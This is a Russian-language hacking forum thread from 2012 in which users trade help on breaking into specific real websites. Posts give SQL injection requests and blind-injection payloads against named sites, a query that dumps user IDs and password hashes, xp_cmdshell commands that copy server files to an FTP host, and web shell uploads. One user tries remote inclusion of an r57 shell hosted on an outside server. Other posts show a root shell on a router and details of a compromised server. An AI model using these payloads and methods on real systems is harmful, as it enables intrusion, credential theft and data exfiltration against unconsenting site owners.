Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Зачем? Что толку от веб-шелла то?
    p.s хотя можно попробовать залить cgi шелл, но не уверен.
    Code:
    Login: admin
    Password:
    NAME=DSL_2640NRU
    VERSION=1.0.0
    BUILDTIME=Fri Mar 18 08:01:43 UTC 2011
    VENDOR=D-Link Russia
    BUGS=<[email protected]>
    SUMMARY=Root filesystem image for DSL_2640NRU
    BOARDID=96328AVNG_N31
    For help, type 'help' or '?'.
    DSL_2640NRU# sh
    
    
    BusyBox v1.00 (2011.03.18-07:59+0000) Built-in shell (msh)
    Enter 'help' for a list of built-in commands.
    
    # ls /
    VERSION  data     etc      linuxrc  opt      sbin     tmp      var
    bin      dev      lib      mnt      proc     sys      usr      webs
    # ls /webs/
    www
    # ls /webs/www
    css           favicon.ico   index.cgi     passw.html
    dlink.css     fwupdate.cgi  index.html    scripts
    fastweb.cgi   image         info.html     templates
    #
    
    
     
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Народ, помогите разкрутиить скулю, никак не могу подобрать количество колонок

     
    #19102 qaz, 26 Jan 2012
    Last edited: 26 Jan 2012
  3. Gul4atai

    Gul4atai New Member

    Joined:
    23 Jan 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Post Sql

    Запрос для выполнения SQL инъекции:

    POST /register.php HTTP/1.1
    Host: partners.gigagame.ru
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 78

    email='&passone=1&passtwo=1&lastname=1&firstname=1&midname=1&keeper=1&Submit=1



    Результат работы

    <...>
    тнера</h1>
    <div class="contentin">

    <br />
    <b>Warning</b>: mysql_numrows(): supplied argument is not a valid MySQL result resource in <b>/home/cdmag/data/www/dvdshka.ru/partners/partners_ufunctions.php</b> on line <b>264</b><br />
    <div align=center><FONT color=red><br>Адрес электронной почты не может быть без символа "@"<br>Вы не указали адреса своих сайтов<br>Вы не правильно указали WMR кош
    <...>
    ______________________________________________

    Каким образом выполнить SQL инъекция по методу post исходя из текущих данных?
     
  4. exzi11

    exzi11 Member

    Joined:
    4 Feb 2011
    Messages:
    18
    Likes Received:
    6
    Reputations:
    0
    Сайт на Joomle. Как определить её версию?
     
  5. AlonDelon

    AlonDelon Member

    Joined:
    12 Nov 2010
    Messages:
    322
    Likes Received:
    18
    Reputations:
    -3
    http://site.com/configuration.php-dist
    или в исходниках админки:
    http://www.site.com/administrator/
    <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
     
  6. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    Вот вопросег... есть юзер mssql (2008 r2), с xp_cmdshell. Хочу зааплоудить файлики с харда серва на фтп. Делаю так со своей машины :

    Start run cmd ->
    Code:
     ftp -A -i -s:\\IP_ADDR\Users\Public\cmd.txt IP_ADDR 
    Всё канает - фтп выполняет содержимое cmd.txt после подключения к ftp. Но вот если делать так :

    Code:
    exec xp_cmdshell 'c:\windows\system32\ftp.exe -A -i -s:\\IP_ADDR\Users\Public\cmd.txt IP_ADDR'
    - канать не хочет. Пишет


    Code:
    Error opening script file \\IP_ADDR\Users\Public\cmd.txt.
    Error opening script file \\IP_ADDR\Users\Public\cmd.txt.
    NULL
    Transfers files to and from a computer running an FTP server service
    (sometimes called a daemon). Ftp can be used interactively.
    .............................
    
    Подскажите, что может быть не так ? )
     
  7. h.elg

    h.elg New Member

    Joined:
    20 Jan 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Движок webasyst
    Посмотрел видео: http://www.youtube.com/watch?v=DgXCGzRLvYY
    Дохожу до момента Duplicate entry for key group с помощью
    Как дальше выдрать хешы?

    Колонки
    U_ID
    U_PASSWORD
     
  8. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    120
    Likes Received:
    34
    Reputations:
    55
    ну так вместо вывода версии (select+version()) пиши свой запрос, типа
    Code:
    select concat_ws(0x3a,u_id,u_password) from имя_таблицы_в_которой_пасс limit 0,1
    
    очевидно же
     
  9. h.elg

    h.elg New Member

    Joined:
    20 Jan 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    не смог зделать сам по этому прошу помощь >.<
     
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Такой вопрос,

    Скуля там или нет? если да то правильно ли я её разкручиваю(ну в смысле подбора колонок)
     
  11. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862

    Скуля однозначно

    Code:
    
    http://britishcat.ru/articlees5354/**/and/**/1=1.html  TRUE
    
    http://britishcat.ru/articlees5354/**/and/**/1=2.html  FALSE
    
    http://britishcat.ru/articlees5354/**/and/**/1=1/**/group/**/by/**/1.html
    
    Крути как слепую

    Code:
    http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=5.html   TRUE
    
    http://britishcat.ru/article_s5354&post=104817/**/and/**/substring((@@version),1,1)=4.html   FALSE
    
     
    _________________________
    #19111 BigBear, 26 Jan 2012
    Last edited: 27 Jan 2012
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862

    Ничё интересного там нет... Прав на запись тоже...

    Code:
    FreeBSD cl1108.azar-a.net 8.2-RELEASE-p3 FreeBSD 8.2-RELEASE-p3 #0: 
    1004 ( apache ) Group: 1003 ( apache )
    5.2.17 
    Safe mode: OFF
    /home/admin/domains/gorod-dolgoprudny.ru/public_html/ drwxr-xr-x 
     
    _________________________
  13. h.elg

    h.elg New Member

    Joined:
    20 Jan 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Имею дело с самописным мини-движком, имею доступ в админ-панель где можно добавлять категории, юзеров и редактировать новости, когда редактирую новости имею возможность управлять с исходным кодом страницы html, решил вставить туда шелл но открывается Bad Request. КАК можно использовать имея доступ к html?
     
  14. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    если там только html то никак, ищи другие возможности, качалки там разные, в редакторах обычно качалка шела есть
     
  15. Iggy

    Iggy New Member

    Joined:
    24 Jun 2010
    Messages:
    104
    Likes Received:
    4
    Reputations:
    1
    BigBear через фото галерею шелл запилил? ;)
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    нет, не через фотогалерею.
     
    _________________________
  17. NZT

    NZT New Member

    Joined:
    31 Dec 2011
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Решил научиться php injection но у меня чето не получается залить шелл, уверен что делаю какую то мелочь не так поэтому не получается но что не так не знаю.
    Есть тренировочный сайт DVWA , в разделе File Inclusion в строке http://localhost/denwer/dvwa/vulnerabilities/fi/?page=include.php после page как описано в статье вставляю свой шелл вот так http://localhost/denwer/dvwa/vulnerabilities/fi/?page=http://msp.hut4.ru/r57shell и вместо шелла мне показывает ошибки :

    [​IMG]

    Если я пишу любое слово после page= то показывает ошибки :

    [​IMG]

    Или здесь не возможен php include ? потомучто всместо слова include должно быть main ?

    Только прошу пожалуйста не трогайте мой сайт msp пока я еще не разобрался , мне он нужен для тренировок )

    Помогите пожалуйста , очень хочу научиться. Поидее в DVWA на легком уровне должно все работать.

    Спасибо.
     
    #19117 NZT, 27 Jan 2012
    Last edited: 27 Jan 2012
  18. h.elg

    h.elg New Member

    Joined:
    20 Jan 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Нашел там прикрепить фотографию к новосте, открывается страница uploadp.php, пробовал загрузил шелл, пишет unable to move file...
     
  19. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    подставляй http://msp.hut4.ru/r57shell.php или http://msp.hut4.ru/r57shell.txt?
     
  20. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Там и дураку должно быть понятно, что в данном случае allow_url_include=0, а нужен allow_url_include=1
     
Thread Status:
Not open for further replies.